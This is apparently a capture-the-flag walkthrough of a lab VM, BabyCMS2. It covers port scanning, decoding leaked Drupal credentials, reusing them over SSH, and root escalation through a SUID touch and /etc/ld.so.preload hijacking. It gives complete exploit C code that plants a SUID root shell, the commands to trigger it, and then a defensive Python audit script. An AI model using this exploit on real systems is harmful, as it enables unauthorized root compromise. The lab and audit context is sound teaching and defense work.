BabyCMS2
nmap -p- 192.168.5.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 05:50 EST
Nmap scan report for 192.168.5.43 (192.168.5.43)
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:5D:0A:A3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Looking at port 80 first: the page source contains <!-- babycms2.dsz -->, which is most likely the site's hostname. Started with a directory scan.
Found backup.txt. Base64-decoding its contents gives nqzva:36dTUqIRDAqX38ZnFFYx, which looks odd and not quite like a username:password pair. On a hunch I ran it through ROT13 and got admin:36qGHdVEQNdK38MaSSLk, which does look like credentials. Nothing else of interest there.
Then added the hostname to /etc/hosts and checked the site by name. Wappalyzer identifies it as Drupal 11: http://babycms2.dsz/drupal/user/login
Logged in successfully with those credentials. Searched for Drupal 11 vulnerabilities and found nothing useful. Under People there is another user, henry. Tried the same password over SSH as henry:36qGHdVEQNdK38MaSSLk, and it worked.
henry@BabyCMS2:~$ cat user.txt
flag{user-c2088f0b8df91f708406ad4acf3d3b92}
That's the user flag. On to privilege escalation.
henry@BabyCMS2:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for henry:
Sorry, user henry may not run sudo on BabyCMS2.
No sudo rights. Listed SUID files with find / -perm -4000 2>/dev/null and noticed that touch is SUID. Looked at touch's options, at cron jobs, at the service on local port 3306, and ran pypy64, but none of that turned up anything useful.
Then I found the CSDN blog post "touch 命令 suid 也能提权?教你一招基于库文件劫持的提权攻击!_动态库劫持提权" by sublarge (a SUID touch can escalate privileges too: privilege escalation via shared-library hijacking) and followed it step by step to get root. The idea: a SUID touch combined with umask 000 creates a world-writable /etc/ld.so.preload, and a library listed there is loaded into every dynamically linked program, including SUID binaries that run as root.
henry@BabyCMS2:~$ cd /tmp
henry@BabyCMS2:/tmp$ cat <<EOF > pe.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <sys/types.h>
>
> // _init runs automatically when the library is loaded
> void _init() {
> // [Key] if an unprivileged user loads this library, bail out to avoid an infinite loop
> if (geteuid() != 0) return;
>
> // Only root processes get past this point
> // 1. Remove the preload file immediately so nothing else is affected
> unlink("/etc/ld.so.preload");
>
> // 2. Elevate privileges
> setuid(0);
> setgid(0);
>
> // 3. Create a SUID backdoor shell
> system("cp /bin/bash /tmp/rootsh; chmod +s /tmp/rootsh");
> }
> EOF
henry@BabyCMS2:/tmp$ gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
henry@BabyCMS2:/tmp$ umask 000
henry@BabyCMS2:/tmp$ /usr/bin/touch /etc/ld.so.preload
henry@BabyCMS2:/tmp$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root root 0 Dec 26 20:27 /etc/ld.so.preload
henry@BabyCMS2:/tmp$ echo "/tmp/pe.so" > /etc/ld.so.preload
henry@BabyCMS2:/tmp$ sudo --help # run any SUID program so the library gets loaded as root
henry@BabyCMS2:/tmp$ ls -l /tmp/rootsh
-rwsr-sr-x 1 root root 1168776 Dec 26 20:28 /tmp/rootsh
henry@BabyCMS2:/tmp$ /tmp/rootsh -p
rootsh-5.0# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
rootsh-5.0# cat /root/root.txt
flag{root-19c1d0bdafbf97b0f104818f5911dc64}
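The escalation above relies on two misconfigurations: a SUID bit on a coreutils binary (touch) that never needs one, and an /etc/ld.so.preload that an unprivileged user can create and write. The following audit script is an added example written for this writeup; it is not part of the original post or of the referenced blog. It walks a directory tree for SUID files whose names are not in an allowlist of binaries that normally carry SUID (the allowlist is an assumption for a Debian-style host; adjust it to your baseline), and inspects an ld.so.preload file for non-root ownership, group/world write permission, and entries outside the system library directories. All paths are parameters so the checks run against a constructed directory tree offline; the constructed fixture in build_demo_tree mirrors the state the writeup produced (a SUID touch and a world-writable preload pointing at /tmp/pe.so).

```python
"""Added example (not from the original writeup): audit for the two conditions
the ld.so.preload privilege escalation depends on."""
import os
import stat
import tempfile

# Assumption: binaries that legitimately carry SUID on a typical Debian/Ubuntu
# host. Tune this allowlist to the distribution's own baseline.
EXPECTED_SUID = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
    "mount", "umount", "fusermount3", "pkexec", "ssh-keysign",
}

# Preload entries are expected to live under the system library directories.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def find_unexpected_suid(root):
    """Walk `root` and return sorted paths of regular SUID files whose
    basename is not in EXPECTED_SUID (e.g. a SUID /usr/bin/touch)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                if name not in EXPECTED_SUID:
                    hits.append(path)
    return sorted(hits)


def check_preload(preload_path="/etc/ld.so.preload"):
    """Return a list of findings for an ld.so.preload file.
    An absent file is the normal state and yields an empty list."""
    findings = []
    try:
        st = os.lstat(preload_path)
    except FileNotFoundError:
        return findings
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("preload file is group- or world-writable (mode %o)"
                        % (st.st_mode & 0o777))
    if st.st_uid != 0:
        findings.append("preload file is not owned by root (uid %d)" % st.st_uid)
    with open(preload_path) as fh:
        for line in fh:
            lib = line.strip()
            if not lib or lib.startswith("#"):
                continue
            if not lib.startswith(TRUSTED_LIB_DIRS):
                findings.append("preload entry outside system library dirs: %s" % lib)
    if not findings:
        # A preload file that passes every check is still unusual enough to report.
        findings.append("preload file exists; confirm each entry is intentional")
    return findings


def build_demo_tree():
    """Constructed fixture for offline testing: a SUID 'touch', a SUID 'sudo'
    (allowlisted), and a world-writable preload pointing at /tmp/pe.so.
    Returns (root, suid_touch_path, preload_path)."""
    root = tempfile.mkdtemp(prefix="preload-audit-")
    touch = os.path.join(root, "touch")
    sudo = os.path.join(root, "sudo")
    for p in (touch, sudo):
        open(p, "w").close()
        os.chmod(p, 0o4755)  # set the SUID bit on the constructed files
    preload = os.path.join(root, "ld.so.preload")
    with open(preload, "w") as fh:
        fh.write("/tmp/pe.so\n")
    os.chmod(preload, 0o666)  # what umask 000 + SUID touch produced above
    return root, touch, preload


if __name__ == "__main__":
    # Audit the live system when run directly.
    for path in find_unexpected_suid("/usr"):
        print("unexpected SUID:", path)
    for finding in check_preload():
        print("ld.so.preload:", finding)
```

On a healthy host both functions return empty lists; on the box in this writeup they would report /usr/bin/touch and the world-writable preload file. The preload check is also worth running from cron or a file-integrity monitor, since the exploit's own _init unlinks /etc/ld.so.preload after the first root load and the window in which the file exists is short.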